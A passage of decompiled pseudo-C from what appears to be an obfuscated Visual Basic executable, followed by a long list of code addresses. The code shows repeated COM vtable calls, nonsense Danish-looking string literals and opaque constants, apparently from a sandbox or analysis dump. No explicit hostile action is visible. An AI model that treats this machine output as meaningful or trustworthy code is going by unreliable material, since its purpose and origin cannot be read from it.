				_t1005 =  *((intOrPtr*)( *_v308 + 0x158))(_v308,  &_v88, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x30c))( *_v412));
				asm("fclex");
				_v312 = _t1005;
				if(_v312 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x4034ec);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v416 = _t1005;
				}
				_push(0);
				_push(0);
				_push(_v88);
				_push( &_v136);
				L00401414();
				_t1571 = _t1570 + 0x10;
				if( *0x415010 != 0) {
					_v420 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v420 = 0x415010;
				}
				_t1010 =  &_v92;
				L0040140E();
				_v316 = _t1010;
				_t1014 =  *((intOrPtr*)( *_v316 + 0x68))(_v316,  &_v248, _t1010,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x308))( *_v420));
				asm("fclex");
				_v320 = _t1014;
				if(_v320 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x4034fc);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v424 = _t1014;
				}
				if( *0x415010 != 0) {
					_v428 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v428 = 0x415010;
				}
				_t1018 =  &_v96;
				L0040140E();
				_v324 = _t1018;
				_t1022 =  *((intOrPtr*)( *_v324 + 0x80))(_v324,  &_v252, _t1018,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x308))( *_v428));
				asm("fclex");
				_v328 = _t1022;
				if(_v328 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x4034fc);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v432 = _t1022;
				}
				if( *0x415010 != 0) {
					_v436 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v436 = 0x415010;
				}
				_t1442 =  *((intOrPtr*)( *_v436));
				_t1026 =  &_v100;
				L0040140E();
				_v332 = _t1026;
				_t1030 =  *((intOrPtr*)( *_v332 + 0x120))(_v332,  &_v104, _t1026,  *((intOrPtr*)(_t1442 + 0x2fc))( *_v436));
				asm("fclex");
				_v336 = _t1030;
				if(_v336 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40350c);
					_push(_v332);
					_push(_v336);
					L00401402();
					_v440 = _t1030;
				}
				_v368 = _v104;
				_v104 = _v104 & 0x00000000;
				_v144 = _v368;
				_v152 = 9;
				_v260 = _v252;
				_v256 = _v248;
				_v280 =  *0x401168;
				_v112 = 0x19dd0a;
				_v120 = 3;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1036 =  &_v136;
				L004013FC();
				 *_t1571 =  *0x401160;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x6f8859,  &_v120, _t1442,  &_v280, _t1036, _t1036,  &_v256, 0x518f5d,  &_v260, 0x10);
				_push( &_v88);
				_push( &_v100);
				_push( &_v96);
				_push( &_v92);
				_push( &_v84);
				_push(5);
				L004013F6();
				_push( &_v152);
				_push( &_v136);
				_push( &_v120);
				_push(3);
				L0040141A();
				_t1573 = _t1571 + 0x28;
				if( *0x415010 != 0) {
					_v444 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v444 = 0x415010;
				}
				_t1053 =  &_v84;
				L0040140E();
				_v308 = _t1053;
				_t1057 =  *((intOrPtr*)( *_v308 + 0x50))(_v308,  &_v72, _t1053,  *((intOrPtr*)( *((intOrPtr*)( *_v444)) + 0x310))( *_v444));
				asm("fclex");
				_v312 = _t1057;
				if(_v312 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x4034ec);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v448 = _t1057;
				}
				_v372 = _v72;
				_v72 = _v72 & 0x00000000;
				L004013EA();
				_v280 =  *0x401158;
				_t1063 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v280, 0x1b5dc0,  &_v76);
				_v316 = _t1063;
				if(_v316 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x403360);
					_push(_a4);
					_push(_v316);
					L00401402();
					_v452 = _t1063;
				}
				L004013E4();
				L004013DE();
				if( *0x415010 != 0) {
					_v456 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v456 = 0x415010;
				}
				_t1067 =  &_v84;
				L0040140E();
				_v308 = _t1067;
				_t1071 =  *((intOrPtr*)( *_v308 + 0x120))(_v308,  &_v88, _t1067,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x2fc))( *_v456));
				asm("fclex");
				_v312 = _t1071;
				if(_v312 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40350c);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v460 = _t1071;
				}
				if( *0x415010 != 0) {
					_v464 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v464 = 0x415010;
				}
				_t1075 =  &_v92;
				L0040140E();
				_v316 = _t1075;
				_t1079 =  *((intOrPtr*)( *_v316 + 0x48))(_v316,  &_v72, _t1075,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x30c))( *_v464));
				asm("fclex");
				_v320 = _t1079;
				if(_v320 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x4034ec);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v468 = _t1079;
				}
				if( *0x415010 != 0) {
					_v472 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v472 = 0x415010;
				}
				_t1083 =  &_v96;
				L0040140E();
				_v324 = _t1083;
				_t1087 =  *((intOrPtr*)( *_v324 + 0x68))(_v324,  &_v248, _t1083,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x300))( *_v472));
				asm("fclex");
				_v328 = _t1087;
				if(_v328 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40350c);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v476 = _t1087;
				}
				if( *0x415010 != 0) {
					_v480 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v480 = 0x415010;
				}
				_t1091 =  &_v100;
				L0040140E();
				_v332 = _t1091;
				_t1095 =  *((intOrPtr*)( *_v332 + 0xe8))(_v332,  &_v76, _t1091,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x304))( *_v480));
				asm("fclex");
				_v336 = _t1095;
				if(_v336 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x4034fc);
					_push(_v332);
					_push(_v336);
					L00401402();
					_v484 = _t1095;
				}
				L004013D8();
				_v144 = _v248;
				_v152 = 3;
				_v376 = _v72;
				_v72 = _v72 & 0x00000000;
				_v128 = _v376;
				_v136 = 8;
				_v380 = _v88;
				_v88 = _v88 & 0x00000000;
				_v112 = _v380;
				_v120 = 9;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, 0x10,  &_v136,  &_v152,  &_v80, _v76,  &_v236);
				_v64 = _v236;
				_push( &_v76);
				_push( &_v80);
				_push(2);
				L004013D2();
				_push( &_v100);
				_push( &_v96);
				_push( &_v92);
				_push( &_v84);
				_push(4);
				L004013F6();
				_push( &_v152);
				_push( &_v136);
				_push( &_v120);
				_push(3);
				L0040141A();
				_t1576 = _t1573 + 0x30;
				if( *0x415010 != 0) {
					_v488 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v488 = 0x415010;
				}
				_t1122 =  &_v84;
				L0040140E();
				_v308 = _t1122;
				_t1126 =  *((intOrPtr*)( *_v308 + 0x158))(_v308,  &_v88, _t1122,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x30c))( *_v488));
				asm("fclex");
				_v312 = _t1126;
				if(_v312 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x4034ec);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v492 = _t1126;
				}
				_push(0);
				_push(0);
				_push(_v88);
				_push( &_v120);
				L00401414();
				_t1577 = _t1576 + 0x10;
				if( *0x415010 != 0) {
					_v496 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v496 = 0x415010;
				}
				_t1131 =  &_v92;
				L0040140E();
				_v316 = _t1131;
				_t1135 =  *((intOrPtr*)( *_v316 + 0xd8))(_v316,  &_v236, _t1131,  *((intOrPtr*)( *((intOrPtr*)( *_v496)) + 0x304))( *_v496));
				asm("fclex");
				_v320 = _t1135;
				if(_v320 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x4034fc);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v500 = _t1135;
				}
				_v128 = 0xc0ae5;
				_v136 = 3;
				_v248 = 0x551aab;
				_t1138 =  &_v120;
				L004013FC();
				_t1141 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, L"Diapositiver", _t1138, _t1138,  &_v248, _v236,  &_v136);
				_v324 = _t1141;
				if(_v324 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x403360);
					_push(_a4);
					_push(_v324);
					L00401402();
					_v504 = _t1141;
				}
				_push( &_v88);
				_push( &_v92);
				_push( &_v84);
				_push(3);
				L004013F6();
				_push( &_v136);
				_push( &_v120);
				_push(2);
				L0040141A();
				_t1579 = _t1577 + 0x1c;
				if( *0x415010 != 0) {
					_v508 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v508 = 0x415010;
				}
				_t1150 =  &_v84;
				L0040140E();
				_v308 = _t1150;
				_t1154 =  *((intOrPtr*)( *_v308 + 0x88))(_v308,  &_v248, _t1150,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x2fc))( *_v508));
				asm("fclex");
				_v312 = _t1154;
				if(_v312 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x40350c);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v512 = _t1154;
				}
				if( *0x415010 != 0) {
					_v516 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v516 = 0x415010;
				}
				_t1158 =  &_v88;
				L0040140E();
				_v316 = _t1158;
				_t1162 =  *((intOrPtr*)( *_v316 + 0x68))(_v316,  &_v252, _t1158,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x308))( *_v516));
				asm("fclex");
				_v320 = _t1162;
				if(_v320 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x4034fc);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v520 = _t1162;
				}
				if( *0x415010 != 0) {
					_v524 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v524 = 0x415010;
				}
				_t1166 =  &_v92;
				L0040140E();
				_v324 = _t1166;
				_t1170 =  *((intOrPtr*)( *_v324 + 0x160))(_v324,  &_v96, _t1166,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x30c))( *_v524));
				asm("fclex");
				_v328 = _t1170;
				if(_v328 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x4034ec);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v528 = _t1170;
				}
				_push(0);
				_push(0);
				_push(_v96);
				_push( &_v120);
				L00401414();
				_t1580 = _t1579 + 0x10;
				if( *0x415010 != 0) {
					_v532 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v532 = 0x415010;
				}
				_t1175 =  &_v100;
				L0040140E();
				_v332 = _t1175;
				_t1179 =  *((intOrPtr*)( *_v332 + 0x70))(_v332,  &_v256, _t1175,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x310))( *_v532));
				asm("fclex");
				_v336 = _t1179;
				if(_v336 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x4034ec);
					_push(_v332);
					_push(_v336);
					L00401402();
					_v536 = _t1179;
				}
				_v192 = L"Bookdealer8";
				_v200 = 8;
				L00401420();
				_v176 = L"Aftgtsydelserne8";
				_v184 = 8;
				_v272 = 0x20e549;
				_t1180 =  &_v120;
				L004013FC();
				_v268 = _t1180;
				_v264 = _v252;
				_v260 = _v248;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t478 =  &_v272; // 0x20e549
				_v524 = _v256;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v260,  &_v264,  &_v268,  &_v136, _t478, 0x10,  &_v136, L"swarthmore", _t1180);
				L004013F6();
				L0040141A();
				_t1582 = _t1580 + 0x24;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, 2,  &_v120,  &_v136, 5,  &_v84,  &_v88,  &_v92,  &_v100,  &_v96);
				if( *0x415010 != 0) {
					_v540 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v540 = 0x415010;
				}
				_t1203 =  &_v84;
				L0040140E();
				_v308 = _t1203;
				_t1207 =  *((intOrPtr*)( *_v308 + 0x178))(_v308,  &_v236, _t1203,  *((intOrPtr*)( *((intOrPtr*)( *_v540)) + 0x30c))( *_v540));
				asm("fclex");
				_v312 = _t1207;
				if(_v312 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x4034ec);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v544 = _t1207;
				}
				if( *0x415010 != 0) {
					_v548 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v548 = 0x415010;
				}
				_t1211 =  &_v88;
				L0040140E();
				_v316 = _t1211;
				_t1215 =  *((intOrPtr*)( *_v316 + 0x70))(_v316,  &_v248, _t1211,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x2fc))( *_v548));
				asm("fclex");
				_v320 = _t1215;
				if(_v320 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40350c);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v552 = _t1215;
				}
				if( *0x415010 != 0) {
					_v556 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v556 = 0x415010;
				}
				_t1219 =  &_v92;
				L0040140E();
				_v324 = _t1219;
				_t1223 =  *((intOrPtr*)( *_v324 + 0x180))(_v324,  &_v252, _t1219,  *((intOrPtr*)( *((intOrPtr*)( *_v556)) + 0x310))( *_v556));
				asm("fclex");
				_v328 = _t1223;
				if(_v328 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x4034ec);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v560 = _t1223;
				}
				_v112 = 0x4e126c;
				_v120 = 3;
				_v256 = _v248;
				_v240 = _v236;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v240,  &_v256, _v252,  &_v120);
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push(3);
				L004013F6();
				_t1583 = _t1582 + 0x10;
				L004013F0();
				if( *0x415010 != 0) {
					_v564 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v564 = 0x415010;
				}
				_t1237 =  &_v84;
				L0040140E();
				_v308 = _t1237;
				_t1241 =  *((intOrPtr*)( *_v308 + 0x170))(_v308,  &_v248, _t1237,  *((intOrPtr*)( *((intOrPtr*)( *_v564)) + 0x304))( *_v564));
				asm("fclex");
				_v312 = _t1241;
				if(_v312 >= 0) {
					_v568 = _v568 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x4034fc);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v568 = _t1241;
				}
				if( *0x415010 != 0) {
					_v572 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v572 = 0x415010;
				}
				_t1245 =  &_v88;
				L0040140E();
				_v316 = _t1245;
				_t1249 =  *((intOrPtr*)( *_v316 + 0x78))(_v316,  &_v252, _t1245,  *((intOrPtr*)( *((intOrPtr*)( *_v572)) + 0x308))( *_v572));
				asm("fclex");
				_v320 = _t1249;
				if(_v320 >= 0) {
					_v576 = _v576 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x4034fc);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v576 = _t1249;
				}
				if( *0x415010 != 0) {
					_v580 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v580 = 0x415010;
				}
				_t1253 =  &_v92;
				L0040140E();
				_v324 = _t1253;
				_t1257 =  *((intOrPtr*)( *_v324 + 0x50))(_v324,  &_v72, _t1253,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x30c))( *_v580));
				asm("fclex");
				_v328 = _t1257;
				if(_v328 >= 0) {
					_v584 = _v584 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x4034ec);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v584 = _t1257;
				}
				if( *0x415010 != 0) {
					_v588 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v588 = 0x415010;
				}
				_t1261 =  &_v96;
				L0040140E();
				_v332 = _t1261;
				_t1265 =  *((intOrPtr*)( *_v332 + 0x130))(_v332,  &_v236, _t1261,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x308))( *_v588));
				asm("fclex");
				_v336 = _t1265;
				if(_v336 >= 0) {
					_v592 = _v592 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x4034fc);
					_push(_v332);
					_push(_v336);
					L00401402();
					_v592 = _t1265;
				}
				if( *0x415010 != 0) {
					_v596 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v596 = 0x415010;
				}
				_t1269 =  &_v100;
				L0040140E();
				_v340 = _t1269;
				_t1273 =  *((intOrPtr*)( *_v340 + 0x1e8))(_v340,  &_v240, _t1269,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x308))( *_v596));
				asm("fclex");
				_v344 = _t1273;
				if(_v344 >= 0) {
					_v600 = _v600 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x4034fc);
					_push(_v340);
					_push(_v344);
					L00401402();
					_v600 = _t1273;
				}
				if( *0x415010 != 0) {
					_v604 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v604 = 0x415010;
				}
				_t1277 =  &_v104;
				L0040140E();
				_v348 = _t1277;
				_t1281 =  *((intOrPtr*)( *_v348 + 0x178))(_v348,  &_v256, _t1277,  *((intOrPtr*)( *((intOrPtr*)( *_v604)) + 0x308))( *_v604));
				asm("fclex");
				_v352 = _t1281;
				if(_v352 >= 0) {
					_v608 = _v608 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x4034fc);
					_push(_v348);
					_push(_v352);
					L00401402();
					_v608 = _t1281;
				}
				_v264 = _v256;
				_v244 = _v236;
				_v384 = _v72;
				_v72 = _v72 & 0x00000000;
				_t1509 =  &_v76;
				L004013EA();
				_v260 = _v252;
				_v112 = _v248;
				_v120 = 3;
				 *_t1583 =  *0x401150;
				 *_t1583 =  *0x401148;
				_t1294 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v120, 0xe6795610, 0x5afc,  &_v260, _t1509, _t1509,  &_v76, _t1509,  &_v244, _v240,  &_v264,  &_v280);
				_v356 = _t1294;
				if(_v356 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x403360);
					_push(_a4);
					_push(_v356);
					L00401402();
					_v612 = _t1294;
				}
				_v32 = _v280;
				L004013E4();
				L004013F6();
				_t1584 = _t1583 + 0x1c;
				L004013F0();
				_t1304 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v248, 6,  &_v84,  &_v88,  &_v92,  &_v96,  &_v100,  &_v104);
				_v308 = _t1304;
				if(_v308 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x403360);
					_push(_a4);
					_push(_v308);
					L00401402();
					_v616 = _t1304;
				}
				_v36 = _v248;
				if( *0x415010 != 0) {
					_v620 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v620 = 0x415010;
				}
				_t1308 =  &_v84;
				L0040140E();
				_v308 = _t1308;
				_t1312 =  *((intOrPtr*)( *_v308 + 0x198))(_v308,  &_v72, _t1308,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x308))( *_v620));
				asm("fclex");
				_v312 = _t1312;
				if(_v312 >= 0) {
					_v624 = _v624 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x4034fc);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v624 = _t1312;
				}
				_v388 = _v72;
				_v72 = _v72 & 0x00000000;
				_t1515 =  &_v76;
				L004013EA();
				_v280 =  *0x401140;
				 *_t1584 =  *0x401138;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4, _t1515, _t1515,  &_v280, 0x3c314e,  &_v76,  &_v236);
				_v68 = _v236;
				L004013E4();
				L004013DE();
				if( *0x415010 != 0) {
					_v628 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v628 = 0x415010;
				}
				_t1324 =  &_v84;
				L0040140E();
				_v308 = _t1324;
				_t1328 =  *((intOrPtr*)( *_v308 + 0x50))(_v308,  &_v72, _t1324,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x2fc))( *_v628));
				asm("fclex");
				_v312 = _t1328;
				if(_v312 >= 0) {
					_v632 = _v632 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40350c);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v632 = _t1328;
				}
				if( *0x415010 != 0) {
					_v636 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v636 = 0x415010;
				}
				_t1332 =  &_v88;
				L0040140E();
				_v316 = _t1332;
				_t1336 =  *((intOrPtr*)( *_v316 + 0x70))(_v316,  &_v248, _t1332,  *((intOrPtr*)( *((intOrPtr*)( *_v636)) + 0x2fc))( *_v636));
				asm("fclex");
				_v320 = _t1336;
				if(_v320 >= 0) {
					_v640 = _v640 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40350c);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v640 = _t1336;
				}
				if( *0x415010 != 0) {
					_v644 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v644 = 0x415010;
				}
				_t1340 =  &_v92;
				L0040140E();
				_v324 = _t1340;
				_t1344 =  *((intOrPtr*)( *_v324 + 0x80))(_v324,  &_v252, _t1340,  *((intOrPtr*)( *((intOrPtr*)( *_v644)) + 0x2fc))( *_v644));
				asm("fclex");
				_v328 = _t1344;
				if(_v328 >= 0) {
					_v648 = _v648 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40350c);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v648 = _t1344;
				}
				if( *0x415010 != 0) {
					_v652 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v652 = 0x415010;
				}
				_t1348 =  &_v96;
				L0040140E();
				_v332 = _t1348;
				_t1352 =  *((intOrPtr*)( *_v332 + 0x198))(_v332,  &_v76, _t1348,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x304))( *_v652));
				asm("fclex");
				_v336 = _t1352;
				if(_v336 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x4034fc);
					_push(_v332);
					_push(_v336);
					L00401402();
					_v656 = _t1352;
				}
				_v392 = _v76;
				_v76 = _v76 & 0x00000000;
				_t1530 =  &_v80;
				L004013EA();
				_v396 = _v72;
				_v72 = _v72 & 0x00000000;
				_v112 = _v396;
				_v120 = 8;
				 *_t1584 = _v252;
				 *_t1584 = _v248;
				 *_t1584 =  *0x401130;
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x41f605d0, 0x5b00,  &_v120, _t1530, _t1530, _t1530, _t1530,  &_v80);
				L004013E4();
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push(4);
				L004013F6();
				_t1585 = _t1584 + 0x14;
				L004013F0();
				if( *0x415010 != 0) {
					_v660 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v660 = 0x415010;
				}
				_t1368 =  &_v84;
				L0040140E();
				_v308 = _t1368;
				_t1372 =  *((intOrPtr*)( *_v308 + 0x138))(_v308,  &_v88, _t1368,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x304))( *_v660));
				asm("fclex");
				_v312 = _t1372;
				if(_v312 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x4034fc);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v664 = _t1372;
				}
				_push(0);
				_push(0);
				_push(_v88);
				_push( &_v120);
				L00401414();
				_t1586 = _t1585 + 0x10;
				if( *0x415010 != 0) {
					_v668 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v668 = 0x415010;
				}
				_t1377 =  &_v92;
				L0040140E();
				_v316 = _t1377;
				_t1381 =  *((intOrPtr*)( *_v316 + 0x68))(_v316,  &_v248, _t1377,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x30c))( *_v668));
				asm("fclex");
				_v320 = _t1381;
				if(_v320 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x4034ec);
					_push(_v316);
					_push(_v320);
					L00401402();
					_v672 = _t1381;
				}
				if( *0x415010 != 0) {
					_v676 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v676 = 0x415010;
				}
				_t1385 =  &_v96;
				L0040140E();
				_v324 = _t1385;
				_t1389 =  *((intOrPtr*)( *_v324 + 0x180))(_v324,  &_v252, _t1385,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x30c))( *_v676));
				asm("fclex");
				_v328 = _t1389;
				if(_v328 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x4034ec);
					_push(_v324);
					_push(_v328);
					L00401402();
					_v680 = _t1389;
				}
				_v240 = 0x967;
				_v236 = 0x669;
				_v256 = _v248;
				_t1542 =  &_v72;
				L004013D8();
				_t1686 =  *0x401128;
				 *_t1586 = _t1686;
				_t1393 =  &_v120;
				L004013FC();
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v72, _t1393, _t1393,  &_v256,  &_v236, _v252,  &_v240, _t1542, _t1542);
				L004013E4();
				L004013F6();
				L004013F0();
				_t1404 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 4,  &_v84,  &_v92,  &_v96,  &_v88);
				asm("fclex");
				_v308 = _t1404;
				if(_v308 >= 0) {
					_v684 = _v684 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x403330);
					_push(_a4);
					_push(_v308);
					L00401402();
					_v684 = _t1404;
				}
				while(1) {
					asm("fld1");
					_v176 = _t1686;
					_v184 = 5;
					L004013C6();
					L004013CC();
					 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v120,  &_v184,  &_v52);
					_v176 = 0x4ffff;
					_v184 = 0x8003;
					_push( &_v52);
					_t1412 =  &_v184;
					_push(_t1412);
					L004013C0();
					if(_t1412 == 0) {
						break;
					}
				}
				_t1416 =  *((intOrPtr*)( *_a4 + 0x730))(_a4);
				_v8 = 0;
				asm("wait");
				_push(0x4102d7);
				L004013F0();
				return _t1416;
			}




















































































































































































































































        0x0040e207
        0x0040e216
        0x0040e222
        0x0040e22a
        0x0040e22d
        0x0040e23a
        0x0040e240
        0x0040e242
        0x0040e24d
        0x0040e250
        0x0040e254
        0x0040e257
        0x0040e25c
        0x0040e261
        0x0040e267
        0x0040e269
        0x0040e26a
        0x0040e270
        0x0040e27a
        0x0040e284
        0x0040e28e
        0x0040e298
        0x0040e29f
        0x0040e2a9
        0x0040e2b3
        0x0040e2c6
        0x0040e2d1
        0x0040e2d8
        0x0040e2df
        0x0040e2e0
        0x0040e2e5
        0x0040e2e6
        0x0040e2f1
        0x0040e2f8
        0x0040e2ff
        0x0040e303
        0x0040e304
        0x0040e306
        0x0040e30b
        0x0040e30b
        0x0040e315
        0x0040e332
        0x0040e317
        0x0040e317
        0x0040e31c
        0x0040e321
        0x0040e326
        0x0040e326
        0x0040e356
        0x0040e35a
        0x0040e35f
        0x0040e377
        0x0040e37d
        0x0040e37f
        0x0040e38c
        0x0040e3b1
        0x0040e38e
        0x0040e38e
        0x0040e393
        0x0040e398
        0x0040e39e
        0x0040e3a4
        0x0040e3a9
        0x0040e3a9
        0x0040e3c3
        0x0040e3c8
        0x0040e3d1
        0x0040e3dd
        0x0040e3e9
        0x0040e3ef
        0x0040e3f3
        0x0040e3f8
        0x0040e429
        0x0040e42f
        0x0040e43c
        0x0040e45e
        0x0040e43e
        0x0040e43e
        0x0040e443
        0x0040e448
        0x0040e44b
        0x0040e451
        0x0040e456
        0x0040e456
        0x0040e46b
        0x0040e474
        0x0040e47a
        0x0040e47e
        0x0040e47f
        0x0040e481
        0x0040e486
        0x0040e48c
        0x0040e498
        0x0040e4b5
